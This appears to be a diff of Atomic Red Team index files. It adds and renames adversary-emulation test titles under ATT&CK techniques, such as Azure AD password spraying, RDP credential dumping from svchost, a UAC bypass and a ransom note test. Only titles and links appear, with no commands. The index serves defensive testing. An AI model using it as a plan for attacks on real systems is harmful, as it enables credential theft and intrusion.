 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -28,15 +30,19 @@
  - Atomic Test #1: Packet Capture Linux [linux]
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
+  - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
+  - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
 - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
  - Atomic Test #2: Discover Private SSH Keys [macos, linux]
  - Atomic Test #3: Copy Private SSH Keys with CP [linux]
  - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -122,7 +128,9 @@
 - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
  - Atomic Test #1: Make and modify binary from C source [macos, linux]
@@ -134,6 +142,7 @@
  - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
  - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
  - Atomic Test #1: Create Systemd Service and Timer [linux]
 - [T1546.005 Trap](../../T1546.005/T1546.005.md)
@@ -231,7 +240,8 @@
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -398,10 +408,14 @@
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

 # persistence
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098 Account Manipulation](../../T1098/T1098.md)
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+  - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
+  - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
+  - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
 - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
  - Atomic Test #1: At - Schedule a job [linux]
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -411,7 +425,8 @@
  - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
  - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
  - Atomic Test #3: Firefox [linux, windows, macos]
- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
@@ -451,7 +466,9 @@
 - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -461,6 +478,7 @@
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
  - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
  - Atomic Test #1: Create Systemd Service and Timer [linux]
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -598,6 +616,7 @@
  - Atomic Test #4: scp remote file copy (pull) [linux, macos]
  - Atomic Test #5: sftp remote file copy (push) [linux, macos]
  - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+  - Atomic Test #14: whois file download [linux, macos]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [macos, linux]
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -4,10 +4,12 @@
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
  - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
  - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
  - Atomic Test #2: Extract passwords with grep [macos, linux]
+  - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
  - Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -201,7 +203,8 @@
  - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
  - Atomic Test #1: Decode base64 Data into Script [macos, linux]
@@ -453,6 +456,7 @@
  - Atomic Test #4: scp remote file copy (pull) [linux, macos]
  - Atomic Test #5: sftp remote file copy (push) [linux, macos]
  - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+  - Atomic Test #14: whois file download [linux, macos]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [macos, linux]
  - Atomic Test #2: Connection Proxy for macOS UI [macos]
@@ -12,6 +12,8 @@
  - Atomic Test #4: Access unattend.xml [windows]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
  - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+  - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+  - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
  - Atomic Test #1: Run Chrome-password Collector [windows]
  - Atomic Test #3: LaZagne - Credentials from Browser [windows]
@@ -19,7 +21,7 @@
  - Atomic Test #1: Enumeration for Credentials in Registry [windows]
  - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
 - [T1003.006 DCSync](../../T1003.006/T1003.006.md)
-  - Atomic Test #1: DCSync [windows]
+  - Atomic Test #1: DCSync (Active Directory) [windows]
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -27,7 +29,7 @@
 - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
-  - Atomic Test #1: Crafting golden tickets with mimikatz [windows]
+  - Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
 - [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
  - Atomic Test #1: GPP Passwords (findstr) [windows]
  - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
@@ -67,18 +69,19 @@
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
+  - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
 - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
  - Atomic Test #1: Password Cracking with Hashcat [windows]
 - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
  - Atomic Test #1: Install and Register Password Filter DLL [windows]
 - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
-  - Atomic Test #1: Brute Force Credentials of all domain users via SMB [windows]
-  - Atomic Test #2: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
+  - Atomic Test #1: Brute Force Credentials of all Active Directory domain users via SMB [windows]
+  - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
  - Atomic Test #1: Password Spray all Domain Users [windows]
  - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
-  - Atomic Test #3: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
+  - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
  - Atomic Test #1: Private Keys [windows]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -178,6 +181,7 @@
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
  - Atomic Test #8: Disable UAC using reg.exe [windows]
+  - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -308,6 +312,7 @@
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
  - Atomic Test #8: Disable UAC using reg.exe [windows]
+  - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -357,10 +362,11 @@
  - Atomic Test #4: Clear Windows Audit Policy Config [windows]
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
  - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
-  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
-  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
-  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
-  - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+  - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+  - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+  - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+  - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
  - Atomic Test #10: Unload Sysmon Filter Driver [windows]
  - Atomic Test #11: Uninstall Sysmon [windows]
@@ -405,7 +411,7 @@
  - Atomic Test #1: Hidden Window [windows]
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
  - Atomic Test #1: Extract binary files via VBA [windows]
-  - Atomic Test #2: Create a user called "$" as noted here [windows]
+  - Atomic Test #2: Create a Hidden User Called "$" [windows]
  - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -437,7 +443,9 @@
  - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
  - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+  - Atomic Test #1: Mount ISO image [windows]
+  - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
 - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
  - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
  - Atomic Test #2: Creating W32Time similar named service using sc [windows]
@@ -533,7 +541,7 @@
  - Atomic Test #9: File Extension Masquerading [windows]
 - T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1207 Rogue Domain Controller](../../T1207/T1207.md)
-  - Atomic Test #1: DCShadow - Mimikatz [windows]
+  - Atomic Test #1: DCShadow (Active Directory) [windows]
 - [T1014 Rootkit](../../T1014/T1014.md)
  - Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
 - T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -763,7 +771,8 @@
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1485 Data Destruction](../../T1485/T1485.md)
  - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
+  - Atomic Test #5: PureLocker Ransom Note [windows]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -818,6 +827,7 @@
  - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
  - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
  - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+  - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
  - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
  - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -973,7 +983,8 @@
  - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
  - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
  - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- T1132.001 Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
+  - Atomic Test #2: XOR Encoded data. [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1041,7 +1052,8 @@
  - Atomic Test #1: Execute a Command as a Service [windows]
  - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
 - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
@@ -1108,7 +1120,8 @@
  - Atomic Test #3: Copy and Execute File with PsExec [windows]
  - Atomic Test #4: Execute command writing output to local Admin Share [windows]
 - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1,16 +1,16 @@
 # Linux Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
